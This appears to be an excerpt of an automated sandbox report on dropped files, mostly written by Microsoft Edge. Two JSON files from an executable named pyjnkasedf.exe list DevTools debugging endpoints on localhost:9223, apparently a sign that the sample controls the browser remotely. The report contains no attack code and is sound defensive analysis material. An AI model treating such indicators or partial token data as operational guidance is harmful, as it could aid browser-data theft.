                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                      Entropy (8bit):3.841729753325884
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxYxl9Il8u/IcEWEwslnh+1aKoh44YgalQwThid1rc:mlYZRVBsln/V44gQwThB
                                                                                                                                                                                                                                                      MD5:DE04480A062DEF4370B189CC551EFCC3
                                                                                                                                                                                                                                                      SHA1:42D174179CA67744F00A9F006A45769384BA2533
                                                                                                                                                                                                                                                      SHA-256:FA406C163153AC07EE05B803D61FF3A30EE00FF28B6A64A59C902CF1B4CB7F4A
                                                                                                                                                                                                                                                      SHA-512:8C3EB4CD724D004017D536D367385DA673B87F9FEEB7BB1315F05BD0FE11D46223C3DCEB36EFAD4E59E5954F150EB05CB26002FAB8DCAF7722086844A664B5E6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.F.R.t.m.H.h.D.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.F.F.8./.v.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                                                                      Entropy (8bit):3.9944481414618407
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:0YZo3Q+Cez2qIKfeygPloCvlx3DO61gLK:0x7Vz0SeygPSCvllD1N
                                                                                                                                                                                                                                                      MD5:588A335AB0F74BBFBD6AB9C8F61A6477
                                                                                                                                                                                                                                                      SHA1:37FD68CB173B35B72ADFC9D6CF23424F8408CA2C
                                                                                                                                                                                                                                                      SHA-256:8A1E00D1289F34CC341A0498956C4C9FED13B380A42D7F5C12118CFB6CF08930
                                                                                                                                                                                                                                                      SHA-512:6135F7942E521DBD145BF7BCBF0783D0D4794296D81A1C09F331CF804894644FCD3900FCE5157B025874B5905740B83F489BB696F5CA7046B6DACBCB5D3FF109
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.j.Q.2.f.n.B.D.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.F.F.8./.v.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                                                                      Entropy (8bit):3.8933379762259896
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xdxl9Il8u/fNYjzX48N9BeffjdCyGbQ1oy/+EUmne2GQdpd/vc:ajYZ+jbxN9BeffjdGuoCwmne2r2
                                                                                                                                                                                                                                                      MD5:8A5F95DA2919AF80B708CB35E79C328F
                                                                                                                                                                                                                                                      SHA1:4C67494489C911C0FF17D879E94F259C116478E8
                                                                                                                                                                                                                                                      SHA-256:7677BB97958DE58E9F3C95A4ED810C2C583D9310BAD19E70F1467910CE1AE28F
                                                                                                                                                                                                                                                      SHA-512:5606FEF936C434AF250224E413E694E4997D1FB798AA34292277A50FB0B4A97B93DB8ACC651D17FE4205BBFCD52AD364AB133663C0099AB8E6E02B60ECB4C75B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".1.P.+.z.r.k.F.i.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.F.F.8./.v.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                                                                                                      Entropy (8bit):5.371234646168334
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:SfNaoCoaXTECohfNaoCDOxCD0fNaoC+OSOVC+OLfNaoCnqMsOJ0UrU0U8Cnq1:6NnCoaXTECo9NnCcCcNnCRChNnCnT0UD
                                                                                                                                                                                                                                                      MD5:86A3175CE650CB629BFCE3A71A9926B2
                                                                                                                                                                                                                                                      SHA1:C54D8C3A5ACCB3B140F678BEBAEA208045B626FE
                                                                                                                                                                                                                                                      SHA-256:DD075763644A36E6CC5893D86D0085FB4AA43B00CE978300801B9507A9E254DC
                                                                                                                                                                                                                                                      SHA-512:5FE0ECEF03A97AAAE6B0D548C3E5E700F28110087F0F7CA68FFE6BD23AD089BC80E9B0CEBEE355206DAA791F8C83C0F184EB9FA58763F09DCE71EFCDEC914B71
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/B50335DB016EAF4BA027A171DABF5D17",.. "id": "B50335DB016EAF4BA027A171DABF5D17",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/B50335DB016EAF4BA027A171DABF5D17"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/466C0D03F38C997030E2133749D3DB75",.. "id": "466C0D03F38C997030E2133749D3DB75",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/466C0D03F38C997030E2133749D3DB75"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3500
                                                                                                                                                                                                                                                      Entropy (8bit):5.393767531359042
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:6NnCMpHCBNnCnbOtbCUNnCCV59CCWNnCddgECdNnCQCQNnCYDCYNnCybfwCyoxNs:6NzKNBNBVZWNW+NbNnJN1bfcwNRG
                                                                                                                                                                                                                                                      MD5:5B2CEBE2FADF5D4A7BBB44D2B52626B8
                                                                                                                                                                                                                                                      SHA1:FA3A31107FEA13583D46C0FAAB8C90DD0F367499
                                                                                                                                                                                                                                                      SHA-256:9D9B6B94585E12C69043392522208BF3AA0BCBE5981390B111A36C328B7AF9FD
                                                                                                                                                                                                                                                      SHA-512:B6BC05C7F6CA309075DE9BA469F3740DEF1376511DE4CEE85F142C0FF6EBA55B0DAECE96AEFED2FFAE203D02F5BAE8CF89C5F51A6F0772D7FC4F4AB920A39C3D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/DD705AB2F93740CA323A8840A9E79E14",.. "id": "DD705AB2F93740CA323A8840A9E79E14",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/DD705AB2F93740CA323A8840A9E79E14"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/E4E70E80F4C940C7C603AC8DD61D5A9E",.. "id": "E4E70E80F4C940C7C603AC8DD61D5A9E",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/E4E70E80F4C940C7C603AC8DD61D5A9E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1784639
                                                                                                                                                                                                                                                      Entropy (8bit):7.995694068688742
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:49152:gQLWD5VhuYXfVFyORPINoTMNndrvfQ2G7oS17WC:gQL2VUYPOYQNoT4rvfQ2XAZ
                                                                                                                                                                                                                                                      MD5:35A36C60FD6270CED33028B66F4F22B5
                                                                                                                                                                                                                                                      SHA1:261F18895267A43C7DA00A7D392F98AF28D776DA
                                                                                                                                                                                                                                                      SHA-256:F3DDF3D5DFFA226522332D497297DAA501537BFC893B4E7EA12CD7C45F6D7C55
                                                                                                                                                                                                                                                      SHA-512:DA55FEC2D0D534706A9D0D2B91C7A9600E65EE735BEF73D4080FAA5D7B27CC616739C4FC5ED1CB979F0E05A99F8617FC2DF96F238ACFAFFCC9750F6D1E2B5F0C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):206855
                                                                                                                                                                                                                                                      Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                      MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                      SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                      SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                      SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1420
                                                                                                                                                                                                                                                      Entropy (8bit):5.430810748835206
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:Yac54VJfe54V80NBgu5SBxK0Npm25Spe0TxqXIp5r7qJ0q8pSm5KKJp0xXDhL5M:Yac5oJG5o807d54xK07m25Ee0TxqXIph
                                                                                                                                                                                                                                                      MD5:1117A0F2BBD38CEE5B481AE87F99677A
                                                                                                                                                                                                                                                      SHA1:AADE0A4318AD208D4000FC64B1423DC46F7A3C5C
                                                                                                                                                                                                                                                      SHA-256:D372DB8F3918E5D3B832C951F6E4549A2BA660F3AB04F03B3B4B483571C0BB14
                                                                                                                                                                                                                                                      SHA-512:32998F924088FE76A19AA797FEADB8E8B1904FE8A00540B0B386ED91F933F6BDCC3E7680CBCD292BBCE40F2F664377A9DB74C0BA2C373C359BC830488346BFBD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/094927", "correlationVector":"2Yoymfq2DNqKkEQxScdye6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/094932", "correlationVector":"f8obPuKjAlRxEct+yTS+WU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/094932", "correlationVector":"3424AD3BF2D647858C80467BB9A206FC","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/102334", "correlationVector":"R7sA2ORjmzFG+jb9x+Jiab","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/102334", "correlationVector":"C4F87C103BB24B0EA24A826332D35037","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/102550", "correlationVector":"gABMZMZtO1erzif4SmQ7ja","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/102550", "correlationVector":"15ED17FAD0C64F2DB623BFAC8C77343C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/103007", "correlationVector":"+pZdWNzglJOCMtTzwL811z","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/103008", "correlationVector":"F3AB7FFA
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):76326
                                                                                                                                                                                                                                                      Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                      MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                      SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                      SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                      SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                      Encrypted:false
